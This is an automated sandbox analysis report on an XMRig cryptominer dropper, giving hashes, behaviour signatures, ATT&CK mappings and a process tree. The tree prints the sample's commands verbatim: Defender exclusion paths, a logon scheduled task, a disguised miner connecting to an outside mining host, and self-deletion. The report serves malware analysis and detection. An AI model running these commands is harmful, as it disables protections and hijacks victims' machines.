Analysis

  • max time kernel
    137s
  • max time network
    129s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    27-07-2021 00:01

General

  • Target

    cab63b06017beec8efd11d7f03ca5a85.exe

  • Size

    99KB

  • MD5

    cab63b06017beec8efd11d7f03ca5a85

  • SHA1

    4f252e828d51bfe8cf1322e6c18656a8a9b359e2

  • SHA256

    cc6611635ca61701a1aa303698270f8e6d8de4f6fc5e6b3a11c5fa9cb1621972

  • SHA512

    9011b9bed98b8474f59e78966d5c31d36348afb256cc3d0a8406beb8038c03cb4d44b72e2fa4fb6868c8242909d71fcbfdcd359f727b9962293240c563da80e4

Score
10/10

Malware Config

Signatures

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner Payload 3 IoCs
  • Executes dropped EXE 4 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Drops file in System32 directory 5 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 26 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 63 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\cab63b06017beec8efd11d7f03ca5a85.exe
    "C:\Users\Admin\AppData\Local\Temp\cab63b06017beec8efd11d7f03ca5a85.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:568
    • C:\Windows\SYSTEM32\cmd.exe
      "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1536
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2824
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2800
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2980
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        PID:1016
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\svchost64.exe "C:\Users\Admin\AppData\Local\Temp\cab63b06017beec8efd11d7f03ca5a85.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4040
      • C:\Users\Admin\AppData\Local\Temp\svchost64.exe
        C:\Users\Admin\AppData\Local\Temp\svchost64.exe "C:\Users\Admin\AppData\Local\Temp\cab63b06017beec8efd11d7f03ca5a85.exe"
        3⤵
        • Executes dropped EXE
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of WriteProcessMemory
        PID:2104
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "splwow64" /tr '"C:\Windows\system32\splwow64.exe"' & exit
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:3804
          • C:\Windows\system32\schtasks.exe
            schtasks /create /f /sc onlogon /rl highest /tn "splwow64" /tr '"C:\Windows\system32\splwow64.exe"'
            5⤵
            • Creates scheduled task(s)
            PID:3140
        • C:\Windows\system32\splwow64.exe
          "C:\Windows\system32\splwow64.exe"
          4⤵
          • Executes dropped EXE
          • Suspicious use of WriteProcessMemory
          PID:348
          • C:\Windows\system32\cmd.exe
            "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:3380
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
              6⤵
              • Suspicious behavior: EnumeratesProcesses
              PID:3148
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
              6⤵
              • Suspicious behavior: EnumeratesProcesses
              PID:2124
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
              6⤵
              • Suspicious behavior: EnumeratesProcesses
              PID:1128
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
              6⤵
              • Suspicious behavior: EnumeratesProcesses
              PID:2584
          • C:\Windows\System32\cmd.exe
            "C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\svchost64.exe "C:\Windows\system32\splwow64.exe"
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:3860
            • C:\Users\Admin\AppData\Local\Temp\svchost64.exe
              C:\Users\Admin\AppData\Local\Temp\svchost64.exe "C:\Windows\system32\splwow64.exe"
              6⤵
              • Executes dropped EXE
              • Drops file in System32 directory
              • Suspicious use of SetThreadContext
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of WriteProcessMemory
              PID:3956
              • C:\Windows\System32\cmd.exe
                "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "splwow64" /tr '"C:\Windows\system32\splwow64.exe"' & exit
                7⤵
                • Suspicious use of WriteProcessMemory
                PID:564
                • C:\Windows\system32\schtasks.exe
                  schtasks /create /f /sc onlogon /rl highest /tn "splwow64" /tr '"C:\Windows\system32\splwow64.exe"'
                  8⤵
                  • Creates scheduled task(s)
                  PID:1596
              • C:\Windows\system32\Microsoft\Libs\sihost64.exe
                "C:\Windows\system32\Microsoft\Libs\sihost64.exe"
                7⤵
                • Executes dropped EXE
                PID:3600
              • C:\Windows\explorer.exe
                C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --donate-level=1 --url=cryptolegion.ddns.net --user={COMPUTERNAME}/LEGION --pass={COMPUTERNAME}/LEGION --cpu-max-threads-hint=20 --cinit-idle-wait=5 --cinit-idle-cpu=80 --nicehash --cinit-stealth
                7⤵
                  PID:1536
                • C:\Windows\System32\cmd.exe
                  "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost64.exe"
                  7⤵
                  • Suspicious use of WriteProcessMemory
                  PID:2304
                  • C:\Windows\system32\choice.exe
                    choice /C Y /N /D Y /T 3
                    8⤵
                      PID:1764
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost64.exe"
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:3604
              • C:\Windows\system32\choice.exe
                choice /C Y /N /D Y /T 3
                5⤵
                  PID:2832

        Network

        MITRE ATT&CK Matrix ATT&CK v6

        Execution

        Scheduled Task

        1
        T1053

        Persistence

        Scheduled Task

        1
        T1053

        Privilege Escalation

        Scheduled Task

        1
        T1053

        Discovery

        System Information Discovery

        1
        T1082

        Command and Control

        Web Service

        1
        T1102

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
          MD5

          ad5cd538ca58cb28ede39c108acb5785

          SHA1

          1ae910026f3dbe90ed025e9e96ead2b5399be877

          SHA256

          c9e6cb04d6c893458d5a7e12eb575cf97c3172f5e312b1f63a667cbbc5f0c033

          SHA512

          c066c5d9b276a68fa636647bb29aea05bfa2292217bc77f5324d9c1d93117772ee8277e1f7cff91ec8d6b7c05ca078f929cecfdbb09582522a9067f54740af13

        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\svchost64.exe.log
          MD5

          84f2160705ac9a032c002f966498ef74

          SHA1

          e9f3db2e1ad24a4f7e5c203af03bbc07235e704c

          SHA256

          7840ca7ea27e8a24ebc4877774be6013ab4f81d1eb83c121e4c3290ceb532d93

          SHA512

          f41c289770d8817ee612e53880d3f6492d50d08fb5104bf76440c2a93539dd25f6f15179b318e67b9202aabbe802941f80ac2dbadfd6ff1081b0d37c33f9da57

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
          MD5

          85bc5686303b9407e337d2e7ed318822

          SHA1

          a3bbbf919888467336b871faa5d1ec8d27511ea5

          SHA256

          42d5e88dd1e7f20b83f18ee85b25cde3e5f762d6c013f54aba5c416f5546e4aa

          SHA512

          f27b268318d572b2f58152553c1aade7e49af74599ae4ad7ba3a4a09db88fd6f94748c90947fa342c35c1acd097746ffc3a6b6a1b7371be935e2dba5fd522a3a

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
          MD5

          88713cc2628823f20808d2b59e8d64d8

          SHA1

          eb40da5682b2bfc9cb02241d6c00c150b09d00e0

          SHA256

          d1c10a1f9e863bbba48c5b5109364c0623506029c511bc382d2ec311aa6ec205

          SHA512

          7ec8388ccce2ad4ef9bf2344202662b1d9f902a3abdea8a28de81f2ddf88afeb32ebedcdfc54d86e2c161b2eeaacfbe86af38ca7da47da8ab99a787550387658

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
          MD5

          756707b373b08e72d5c2d27028e36755

          SHA1

          3434eefa55322fe2c679003c233c37c581c658b7

          SHA256

          107430b98b5db520ff623e939cc3a40b0c9aca43faee814c9107cb479cfdf22e

          SHA512

          9e8f844abda899b5d6878e8e6fd60d27cc0cdf8aa1dce60e47f9a1b5d80c75648a48a967407e45d2531d376132718fefbbafc2d2614f4bb9c656a9cffc9666cd

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
          MD5

          19b8b3cfbfe4a1e42d544ca6710e0cd1

          SHA1

          7442173078cdec084e3dd7fb8575ebac9a4395cc

          SHA256

          933216153ad5bbd1386b9d8186db857828bf700e3f4a990df767ca763fe34bef

          SHA512

          cf13979c4df6bfe50144b0b4011c8060ab3c9128dce6fcb57d0afaf76cb693b59950fdc343e5e49c7a0007976fb6d8f1070244c3098bf63c3eb0da601d86263e

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
          MD5

          9348a3211d5fab2c8b4e3e1a942c7120

          SHA1

          55144051106e59baea3e24a949b32b7e06a5d8e7

          SHA256

          bfdcc8847d1e583e3f8b99f7aa478bf138c494167becae153a41909407442e80

          SHA512

          ec88b68ada061e0c34196c74e502971fd2718ed438fc84fa5edd4353d6b1f80c26f0345e05daaa5b4fdedd5d0c16bf41c74a060605d252ec7ab74131bfb035af

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
          MD5

          783a0c7588a2b28066fc5df2c09c0f36

          SHA1

          d8ed0da384582cfb54bee1e5092478220125447e

          SHA256

          00f6d245722a04bda18091a69fd8d611540e201ee7adaa8f08284aa57554cd20

          SHA512

          b88dc195164a6827a21e1c678e4909b5051a58bc3d16d91f1c79669c92afa093dde6da48e54efe181d01f4903ea199a064a9380d41636cb169786d02f87b3dc5

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
          MD5

          e0da2b7600d89de73e583740dd2d25e2

          SHA1

          4a9c54dc9718baf29a97ec07e89a7eaf43cb7fbb

          SHA256

          04edb0e169a462634a82098acb39301fe2517c699852900a86b9cd9d8f769464

          SHA512

          333ff2dde7c8ed8fc77e3fb420429189d9b904d9d5f0575013ebf6a55c6d12ef84c5ef7289b7ad28f1f927646b8cef701fb0653bf5c8894d8b2f1b79af04228c

        • C:\Users\Admin\AppData\Local\Temp\svchost64.exe
          MD5

          b97dba5ec3906d3b681efdf92b78a4d7

          SHA1

          b90192a2281ba8c2f91097e8abdbab4238a1bd84

          SHA256

          94d81c37666beed9fda950adfe53c554116c45be7eabfcd42b9f5b1feaefbc7f

          SHA512

          ba1d43f0f7e89769c422a879a2836405e3898b1ac18b78309bec835f31096b1643dfaa33d3cab3d7259806705971d78226752d3f3a885663b635d17cbef7e05a

        • C:\Users\Admin\AppData\Local\Temp\svchost64.exe
          MD5

          b97dba5ec3906d3b681efdf92b78a4d7

          SHA1

          b90192a2281ba8c2f91097e8abdbab4238a1bd84

          SHA256

          94d81c37666beed9fda950adfe53c554116c45be7eabfcd42b9f5b1feaefbc7f

          SHA512

          ba1d43f0f7e89769c422a879a2836405e3898b1ac18b78309bec835f31096b1643dfaa33d3cab3d7259806705971d78226752d3f3a885663b635d17cbef7e05a

        • C:\Users\Admin\AppData\Local\Temp\svchost64.exe
          MD5

          b97dba5ec3906d3b681efdf92b78a4d7

          SHA1

          b90192a2281ba8c2f91097e8abdbab4238a1bd84

          SHA256

          94d81c37666beed9fda950adfe53c554116c45be7eabfcd42b9f5b1feaefbc7f

          SHA512

          ba1d43f0f7e89769c422a879a2836405e3898b1ac18b78309bec835f31096b1643dfaa33d3cab3d7259806705971d78226752d3f3a885663b635d17cbef7e05a

        • C:\Users\Admin\AppData\Local\Temp\svchost64.exe
          MD5

          b97dba5ec3906d3b681efdf92b78a4d7

          SHA1

          b90192a2281ba8c2f91097e8abdbab4238a1bd84

          SHA256

          94d81c37666beed9fda950adfe53c554116c45be7eabfcd42b9f5b1feaefbc7f

          SHA512

          ba1d43f0f7e89769c422a879a2836405e3898b1ac18b78309bec835f31096b1643dfaa33d3cab3d7259806705971d78226752d3f3a885663b635d17cbef7e05a

        • C:\Windows\System32\Microsoft\Libs\sihost64.exe
          MD5

          1a39ac13bc88ad7d21e874535107fe83

          SHA1

          a0c88f578af5bed2d873eba3a32b0b712b41f4ae

          SHA256

          25a04f0d47b9c7235412cf56fd1fd74b4bd4fd332abf64a3cdc656f99748ae55

          SHA512

          5d2141bf03aa17c927f7fc6a97d0a36e79af6372b10826d491af31f79b2267b57a02eda258c4ce3a50a322384cde5970ae74ae146bc550939dce90e1cf34e0c1

        • C:\Windows\System32\splwow64.exe
          MD5

          cab63b06017beec8efd11d7f03ca5a85

          SHA1

          4f252e828d51bfe8cf1322e6c18656a8a9b359e2

          SHA256

          cc6611635ca61701a1aa303698270f8e6d8de4f6fc5e6b3a11c5fa9cb1621972

          SHA512

          9011b9bed98b8474f59e78966d5c31d36348afb256cc3d0a8406beb8038c03cb4d44b72e2fa4fb6868c8242909d71fcbfdcd359f727b9962293240c563da80e4

        • C:\Windows\system32\Microsoft\Libs\sihost64.exe
          MD5

          1a39ac13bc88ad7d21e874535107fe83

          SHA1

          a0c88f578af5bed2d873eba3a32b0b712b41f4ae

          SHA256

          25a04f0d47b9c7235412cf56fd1fd74b4bd4fd332abf64a3cdc656f99748ae55

          SHA512

          5d2141bf03aa17c927f7fc6a97d0a36e79af6372b10826d491af31f79b2267b57a02eda258c4ce3a50a322384cde5970ae74ae146bc550939dce90e1cf34e0c1

        • C:\Windows\system32\splwow64.exe
          MD5

          cab63b06017beec8efd11d7f03ca5a85

          SHA1

          4f252e828d51bfe8cf1322e6c18656a8a9b359e2

          SHA256

          cc6611635ca61701a1aa303698270f8e6d8de4f6fc5e6b3a11c5fa9cb1621972

          SHA512

          9011b9bed98b8474f59e78966d5c31d36348afb256cc3d0a8406beb8038c03cb4d44b72e2fa4fb6868c8242909d71fcbfdcd359f727b9962293240c563da80e4

        • memory/348-304-0x0000000002E60000-0x0000000002E62000-memory.dmp
          Filesize

          8KB

        • memory/348-284-0x0000000000000000-mapping.dmp
        • memory/564-458-0x0000000000000000-mapping.dmp
        • memory/568-114-0x0000000000320000-0x0000000000321000-memory.dmp
          Filesize

          4KB

        • memory/568-116-0x000000001C060000-0x000000001C062000-memory.dmp
          Filesize

          8KB

        • memory/1016-246-0x0000024274E93000-0x0000024274E95000-memory.dmp
          Filesize

          8KB

        • memory/1016-245-0x0000024274E90000-0x0000024274E92000-memory.dmp
          Filesize

          8KB

        • memory/1016-233-0x0000000000000000-mapping.dmp
        • memory/1016-272-0x0000024274E96000-0x0000024274E98000-memory.dmp
          Filesize

          8KB

        • memory/1016-273-0x0000024274E98000-0x0000024274E99000-memory.dmp
          Filesize

          4KB

        • memory/1128-382-0x0000024D03343000-0x0000024D03345000-memory.dmp
          Filesize

          8KB

        • memory/1128-417-0x0000024D03348000-0x0000024D03349000-memory.dmp
          Filesize

          4KB

        • memory/1128-415-0x0000024D03346000-0x0000024D03348000-memory.dmp
          Filesize

          8KB

        • memory/1128-381-0x0000024D03340000-0x0000024D03342000-memory.dmp
          Filesize

          8KB

        • memory/1128-369-0x0000000000000000-mapping.dmp
        • memory/1536-477-0x00000000020D0000-0x00000000020F0000-memory.dmp
          Filesize

          128KB

        • memory/1536-475-0x00000000020B0000-0x00000000020D0000-memory.dmp
          Filesize

          128KB

        • memory/1536-476-0x00000000020B0000-0x00000000020D0000-memory.dmp
          Filesize

          128KB

        • memory/1536-466-0x0000000140000000-0x0000000140758000-memory.dmp
          Filesize

          7.3MB

        • memory/1536-117-0x0000000000000000-mapping.dmp
        • memory/1536-467-0x00000001402EB66C-mapping.dmp
        • memory/1536-469-0x00000000004E0000-0x0000000000500000-memory.dmp
          Filesize

          128KB

        • memory/1536-473-0x0000000140000000-0x0000000140758000-memory.dmp
          Filesize

          7.3MB

        • memory/1536-474-0x0000000002090000-0x00000000020B0000-memory.dmp
          Filesize

          128KB

        • memory/1596-463-0x0000000000000000-mapping.dmp
        • memory/1764-472-0x0000000000000000-mapping.dmp
        • memory/2104-275-0x0000000000000000-mapping.dmp
        • memory/2104-281-0x0000000003B40000-0x0000000003B42000-memory.dmp
          Filesize

          8KB

        • memory/2104-278-0x0000000000FA0000-0x0000000000FA1000-memory.dmp
          Filesize

          4KB

        • memory/2104-280-0x00000000018B0000-0x00000000018B1000-memory.dmp
          Filesize

          4KB

        • memory/2124-344-0x000001DD3F4C0000-0x000001DD3F4C2000-memory.dmp
          Filesize

          8KB

        • memory/2124-331-0x0000000000000000-mapping.dmp
        • memory/2124-378-0x000001DD3F4C6000-0x000001DD3F4C8000-memory.dmp
          Filesize

          8KB

        • memory/2124-345-0x000001DD3F4C3000-0x000001DD3F4C5000-memory.dmp
          Filesize

          8KB

        • memory/2124-380-0x000001DD3F4C8000-0x000001DD3F4C9000-memory.dmp
          Filesize

          4KB

        • memory/2304-468-0x0000000000000000-mapping.dmp
        • memory/2584-448-0x00000189DC6D8000-0x00000189DC6D9000-memory.dmp
          Filesize

          4KB

        • memory/2584-446-0x00000189DC6D6000-0x00000189DC6D8000-memory.dmp
          Filesize

          8KB

        • memory/2584-420-0x00000189DC6D3000-0x00000189DC6D5000-memory.dmp
          Filesize

          8KB

        • memory/2584-419-0x00000189DC6D0000-0x00000189DC6D2000-memory.dmp
          Filesize

          8KB

        • memory/2584-408-0x0000000000000000-mapping.dmp
        • memory/2800-173-0x0000028CEC963000-0x0000028CEC965000-memory.dmp
          Filesize

          8KB

        • memory/2800-155-0x0000000000000000-mapping.dmp
        • memory/2800-171-0x0000028CEC960000-0x0000028CEC962000-memory.dmp
          Filesize

          8KB

        • memory/2800-176-0x0000028CEC966000-0x0000028CEC968000-memory.dmp
          Filesize

          8KB

        • memory/2800-207-0x0000028CEC968000-0x0000028CEC969000-memory.dmp
          Filesize

          4KB

        • memory/2824-147-0x0000021EEB0C6000-0x0000021EEB0C8000-memory.dmp
          Filesize

          8KB

        • memory/2824-128-0x0000021EEB0C3000-0x0000021EEB0C5000-memory.dmp
          Filesize

          8KB

        • memory/2824-127-0x0000021EEB0C0000-0x0000021EEB0C2000-memory.dmp
          Filesize

          8KB

        • memory/2824-126-0x0000021EEB5A0000-0x0000021EEB5A1000-memory.dmp
          Filesize

          4KB

        • memory/2824-123-0x0000021EEB2E0000-0x0000021EEB2E1000-memory.dmp
          Filesize

          4KB

        • memory/2824-169-0x0000021EEB0C8000-0x0000021EEB0C9000-memory.dmp
          Filesize

          4KB

        • memory/2824-118-0x0000000000000000-mapping.dmp
        • memory/2832-292-0x0000000000000000-mapping.dmp
        • memory/2980-243-0x00000193F8376000-0x00000193F8378000-memory.dmp
          Filesize

          8KB

        • memory/2980-195-0x0000000000000000-mapping.dmp
        • memory/2980-209-0x00000193F8373000-0x00000193F8375000-memory.dmp
          Filesize

          8KB

        • memory/2980-208-0x00000193F8370000-0x00000193F8372000-memory.dmp
          Filesize

          8KB

        • memory/2980-244-0x00000193F8378000-0x00000193F8379000-memory.dmp
          Filesize

          4KB

        • memory/3140-283-0x0000000000000000-mapping.dmp
        • memory/3148-291-0x0000000000000000-mapping.dmp
        • memory/3148-305-0x00000172BEC86000-0x00000172BEC88000-memory.dmp
          Filesize

          8KB

        • memory/3148-342-0x00000172BEC88000-0x00000172BEC89000-memory.dmp
          Filesize

          4KB

        • memory/3148-306-0x00000172BEC80000-0x00000172BEC82000-memory.dmp
          Filesize

          8KB

        • memory/3148-307-0x00000172BEC83000-0x00000172BEC85000-memory.dmp
          Filesize

          8KB

        • memory/3380-290-0x0000000000000000-mapping.dmp
        • memory/3600-459-0x0000000000000000-mapping.dmp
        • memory/3600-462-0x00000000004A0000-0x00000000004A1000-memory.dmp
          Filesize

          4KB

        • memory/3600-465-0x000000001C040000-0x000000001C042000-memory.dmp
          Filesize

          8KB

        • memory/3604-288-0x0000000000000000-mapping.dmp
        • memory/3804-282-0x0000000000000000-mapping.dmp
        • memory/3860-449-0x0000000000000000-mapping.dmp
        • memory/3956-450-0x0000000000000000-mapping.dmp
        • memory/3956-457-0x000000001CAD0000-0x000000001CAD2000-memory.dmp
          Filesize

          8KB

        • memory/4040-274-0x0000000000000000-mapping.dmp